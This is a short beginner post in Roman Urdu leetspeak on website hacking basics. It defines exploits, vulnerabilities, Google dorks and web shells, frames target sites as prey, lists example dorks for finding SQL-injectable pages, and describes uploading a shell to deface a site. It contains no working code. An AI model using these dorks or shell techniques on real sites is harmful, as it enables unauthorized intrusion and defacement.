Site Hacking Basics: Website Hacking K Lye Ap k0 Kuch En Chez0 Ka Pata h0na Chahye J0 k Site hacking ke Basics h
Exploits,Vulnerbility,Dorks,Shell
Exploits:
Expl0it matlab math0d (Tareqa) Site Hack Krne k lye Mukhtalif Exploits (tareqay) H0te h Har Expl0it ka Apna 1 Tareqa H0ta h kuCh Expl0its ye h Sqlmap,bypass,SQL,Rfi,dnn,xxi,lfi, symlink, Server R0oting etc..Vulnerbility:
Vulnerbility Matlab Hackable Jisk0 h4ck Kiya Ja Sake

Victum:
Victum ham Apne Shikar Target K0 Kahte h jis k0 hack krna h0

Dorks: D0rks 1 Ch0ti c C0ding H0ti h ye Dorks GoOgle me Rakhne Se GoOgle Hame vul site btati h k k0nsi vul h.. Har Expl0it k Apne D0rks H0te h
Jase SQL ka ye h inurl:index.php?/id= inurl.members.ph?/id=
Esi Tarha SQL K LakHo D0rks h0te h..
Shell: Agar Ham K0i Site Hack kr k 0s k Admin Panel tak ph0ntch jate h t0 Ham Direct site k0 Deface nHai Kr Sakte Sirf P0st Aur New P0st he Delete kr Sakte h, Site k0 Mukamal Deface krne k lye Shell use h0ta h ye 1 File h0ti h jis me C0ding ke Gai h0ti h Esk0 Site me Upl0ad krne Se Site Ap k C0ntr0l me aa jay Ge phr Ap j0 Chah0 Site k satH kr Sakte h0 P0sting Delete kr sakte h0 Add kr sakte h0 Aur Site K0 Full Deface kr Sakte h0..

.